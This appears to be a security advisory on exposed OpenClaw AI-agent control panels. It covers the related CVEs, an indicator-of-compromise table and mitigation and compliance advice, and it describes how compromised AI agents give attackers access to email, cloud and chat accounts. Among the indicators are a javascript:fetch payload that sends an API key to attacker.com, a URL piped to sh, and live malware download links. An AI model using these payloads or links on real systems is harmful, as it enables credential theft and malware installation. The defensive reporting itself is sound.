- Implement a software supply chain security tool to automatically scan open-source packages from repositories like npm and PyPI for malicious code, suspicious behaviors, and vulnerabilities before they are approved for developer use.
- Develop and conduct regular security awareness training for all developers, focusing on identifying social engineering attempts on professional networking sites and the security risks of using unvetted, third-party code.
- Configure and tune Endpoint Detection and Response (EDR) policies to detect and alert on suspicious process execution, such as scripts running from unusual user profile directories or processes making unexpected outbound network connections.
- Establish a formal policy governing the use of open-source software, requiring that all new packages undergo a security review and are sourced from a trusted internal artifact repository rather than directly from public repositories.
42,900 OpenClaw Exposed Control Panels and Why You Should Care
The rapid, unsupervised deployment of AI agents like OpenClaw (formerly Moltbot and Clawdbot) has led to 42,900 exposed control panels across 82 countries, with 78% of these instances remaining unpatched against known vulnerabilities. These agents, designed for ease of use by non-technical staff, often store credentials insecurely (sometimes in plaintext local directories or backup files) and operate with broad permissions, creating a significant "visibility gap" in enterprise security. Traditional security models, built for human-paced sessions and managed endpoints, are ill-equipped to handle these autonomous, continuously operating entities that bypass standard IAM workflows and whose activity appears legitimate in logs. Specific vulnerabilities include CVE-2026-25253 (one-click token theft leading to takeover, even on locally bound instances), CVE-2026-25157 (command injection on macOS developer workstations), and CVE-2026-24763 (container escape risk). When compromised, these agents act as "multipliers," granting attackers access to an entire digital workspace, including email, cloud accounts, internal chat, and browser sessions, and can facilitate lateral movement and social engineering. To mitigate this, organizations must immediately scan for OpenClaw signatures (e.g., port 18789) using tools like Shodan or Censys, update to version 2026.1.29 or later, bind the gateway to 127.0.0.1, set strong authentication, rotate all touched credentials, and purge backup files. Furthermore, it is crucial to establish continuous visibility by treating AI agents as privileged non-human identities, adding agent detection to endpoint monitoring, scanning for credential directories, and updating security architecture to aggressively segment agent access, log agent actions, and revise incident response playbooks for agent compromise scenarios.
Severity: Critical
Threat Details and IOCs
| Malware: | AMOS, Atomic macOS Stealer, Atomic Stealer, BadIIS, Broomstick, ClawdBot Agent, CleanUp, CleanUpLoader, ConnectWise Control, ConnectWise ScreenConnect, GhostChat, GORBLE, Lumma, LummaC2, Lumma Stealer, OSX.AtomicStealer, OSX.AtomStealer, OysterLoader, POWERSTAR, Redline, Redline Loader, RedLine Stealer, Rhysida, RisePro, ScreenConnect, Speldings.exe, StealC, TAMECAT, Vidar, Vidar Stealer |
| CVEs: | CVE-2024-28863, CVE-2025-49596, CVE-2025-52882, CVE-2025-64756, CVE-2025-6514, CVE-2026-22708, CVE-2026-24763, CVE-2026-25157, CVE-2026-25253 |
| Technologies: | Alibaba Cloud, Amazon Web Services, Anthropic Claude, Apple iOS, Apple macOS, Caddy, Cloudflare Tunnel, ConnectWise ScreenConnect, DigitalOcean, Docker, Express.js, F5 NGINX, Git, GitHub, Google Cloud Platform, Google Gemini, Hetzner, Kubernetes, Linux, LLaVA, Microsoft Azure, Microsoft Visual Studio, Microsoft Windows, Moltbook, NGINX, Node.js, npm, OpenAI, OpenClaw, OVHcloud, Signal, Slack, SSH, Supabase, Telegram, Tencent Cloud, Vercel Next.js, WhatsApp |
| Threat Actors: | AngryLikho, APT28, ClawHavoc, FancyBear, Kimsuky, Rhysida |
| Attacker IPs: | 178.16.54.253, 179.43.176.32, 202.161.50.59, 54.91.154.110, 91.92.242.30, 95.92.242.30, 96.92.242.30 |
| Attacker Domains: | attacker.com, auth.clawdhub.com, auth.clawhub.com, clawbot.ai, clawd.bot, clawdbot.getintwopc.site, clawdbot.you, clawhub.ai, clawhub.openclaw.ai, darkgptprivate.com, docs.clawd.bot, docs.molt.bot, docs.openclaw.ai, getintwopc.site, github.com/hedefbari, glot.io, install.app-distribution.net, meeting.bulletmailer.net, moltbook.ai, molt.bot, moltbotai.chat, moltbot.you, moltyverse.email, ngrok.io, openclaw.ai, pipedream.net, roarin.ai, socifiapp.com, webhook.site, www.dropbox.com |
| Attacker URLs: | github.com/gstarwd/clawbot, http://54.91.154.110:13338/, http://54.91.154.110:13338/|sh, http://91.92.242.30/6x8c0trkp4l9uugo, http://91.92.242.30/7buu24ly8m1tn8m4, http://91.92.242.30/x5ki60w1ih838sp7, http://clawdbot.getintwopc.site/config.json, http://clawdbot.getintwopc.site/dl/Lightshot.dll, http://clawdbot.getintwopc.site/dl/Lightshot.exe, https://api.moltyverse.email, https://attacker.com, https://darkgptprivate.com/d111, https://github.com/hedefbari/openclaw-agent/releases/download/latest/openclaw-agent.zip, https://glot.io/snippets/hfdxv8uyaf, https://install.app-distribution.net/setup/, https://moltyverse.email/start.md, https://openclaw.ai/install.ps1, https://roarin.ai/api/trpc/botNetwork.me, https://roarin.ai/api/trpc/botNetwork.register, https://swcdn.apple.com/content/downloads/update/software/upd/, https://webhook.site/358866c4-81c6-4c30-9c8c-358db4d04412, https://www.dropbox.com/scl/fi/tmwi4j86op04r9qo2xdgh/zoomupdate.msi?rlkey=ymr9yn5p3q2w2l3uz9cg71dvm&st=q93av9p6&dl=1, hxxp://54.91.154.110:13338/%7Csh, hxxps://socifiapp.com/api/reports/upload, hxxps://webhook.site/358866c4-81c6-4c30-9c8c-358db4d04412, javascript:fetch('https://attacker.com?k='+localStorage.getItem('moltbook_api_key')), ws://localhost:18789 |
| Attacker Hashes: | 04ef48b104d6ebd05ad70f6685ade26c1905495456f52dfe0fb42f550bd43388, 087361307be2b2789849d4fd58170cca, 0e52566ccff4830e30ef45d2ad804eefba4ffe42062919398bf1334aab74dd65, 17703b3d5e8e1fe69d6a6c78a240d8c84b32465fe62bed5610fb29335fe42283, 1e6d4b0538558429422b71d1f4d724c8ce31be92d299df33a8339e32316e2298, 37102fddfbca1e750b61943162b15004, 63e9707b978b7569f26636e9a9bb3b14, 75661cbf8fd50009be0c46a9ca8b3180, adbcdb613c04fd51936cb0863d2417604db0cd04792ab7cae02526d48944c77b, d1e0c26774cb8beabaf64f119652719f673fb530368d5b2166178191ad5fcbea, e20b920c7af988aa215c95bbaa365d005dd673544ab7e3577b60fecf11dcdea2, f58854f6450618729679ad33622bebaf |
| Victim Industries: | Agriculture, Artificial Intelligence, Cloud Infrastructure, Creator Economy, Critical Manufacturing, Education, Energy, Financial Services, Government, Healthcare, Health Care Technology, Hospitality, Information Services, Information Technology, Insurance, Legal Services, Manufacturing, Marketing & Advertising, Media and Entertainment, Multimedia, Retail, Social Media, Software, Sports and Entertainment, Technology Hardware, Telecommunications, Transportation |
| Victim Countries: | Australia, Austria, Belgium, Brazil, Bulgaria, Canada, China, Colombia, Croatia, Cyprus, Czech Republic, Denmark, Estonia, Finland, France, Germany, Greece, Hong Kong, Hungary, India, Ireland, Italy, Japan, Latvia, Lithuania, Luxembourg, Malta, Mexico, Netherlands, Norway, Poland, Portugal, Romania, Russia, Singapore, Slovakia, Slovenia, South Korea, Spain, Sweden, Switzerland, United Kingdom, United States |
Mitigation Advice
- Use external scanning tools like Shodan or Censys to scan all company IP ranges for indicators of OpenClaw, Moltbot, and Clawdbot, specifically looking for open port 18789 and associated HTML titles or favicon hashes.
- For any discovered instances of OpenClaw, Moltbot, or Clawdbot, immediately update them to version 2026.1.29 or later to patch critical vulnerabilities.
- On any discovered OpenClaw instance, configure the service to bind its gateway to the localhost interface (127.0.0.1) and enforce a strong, unique authentication password.
- For any system where an OpenClaw agent was found, immediately rotate all credentials the agent had access to, including API keys, OAuth tokens, SSH keys, and cloud service credentials.
- Use endpoint detection and response (EDR) or scripting to scan all workstations and servers for the presence of credential directories such as ~/.openclaw/, ~/.clawdbot/, and ~/.moltbot/.
- On any host where OpenClaw was installed, manually search for and securely delete any credential backup files (e.g., .bak files) within the agent's data directories to prevent the recovery of old tokens.
Compliance Best Practices
- Develop and implement a formal corporate policy that governs the evaluation, approval, and secure deployment of all AI agents and automation tools.
- Update your identity and access management (IAM) program to classify AI agents as privileged non-human identities, ensuring they are subject to the same inventory, monitoring, and access governance as service accounts.
- Enhance endpoint monitoring by creating and deploying detection rules that look for behavioral patterns of autonomous agents, such as high-frequency API calls, cross-application automation, or off-hours activity from user workstations.
- Update your incident response playbooks with specific procedures for containing and remediating compromised AI agents, including steps for multi-service credential rotation and identifying the full scope of an agent's permissions.
- Implement network and application-level segmentation to ensure that AI agents operate with the principle of least privilege and cannot access multiple disparate services (e.g., email, cloud storage, internal chat) simultaneously.
- Configure application and cloud service logging to capture detailed actions performed by AI agents, and ingest these logs into your SIEM to build detections based on agent-specific activity rather than just user authentication events.
https://cyberpress.org/1-click-clawdbot-vulnerability/
https://cyberpress.org/moltbot-operators-leak-control-panels-via-exposed-mdns-traffic/
https://depthfirst.com/post/1-click-rce-to-steal-your-moltbot-data-and-keys
https://gbhackers.com/15200-openclaw-control-panels-exposed/
https://gbhackers.com/1-click-flaw-in-clawdbot/
https://gbhackers.com/openclaw-2026-2-12-released/
https://securityboulevard.com/2026/02/42900-openclaw-exposed-control-panels-and-why-you-should-care/
https://securityboulevard.com/2026/02/the-agentic-virus-how-ai-agents-become-self-spreading-malware/
https://socradar.io/blog/cve-2026-25253-rce-openclaw-auth-token/
https://sploitus.com/exploit?id=200AAF0D-8E2F-5BF9-9AA0-40C1A1A23652
https://thehackernews.com/2026/01/fake-moltbot-ai-coding-assistant-on-vs.html
https://thehackernews.com/2026/02/openclaw-bug-enables-one-click-remote.html
https://thehackernews.com/2026/02/openclaw-integrates-virustotal-scanning.html
https://the-sequence.com/openclaw-security-risks-autonomous-ai-agents
https://www.esecurityplanet.com/threats/fake-clawdbot-vs-code-extension-deploys-screenconnect-rat/
https://www.securityjoes.com/post/hunting-openclaw-detection-and-containment-guidance-for-defenders
https://www.techzine.eu/news/security/138633/over-40000-openclaw-agents-vulnerable/
https://www.thehackerwire.com/openclaw-client-side-websocket-token-leak-cve-2026-25253/
https://www.thehackerwire.com/openclaw-docker-sandbox-command-injection-cve-2026-24763/
https://www.theregister.com/2026/02/09/openclaw_instances_exposed_vibe_code/


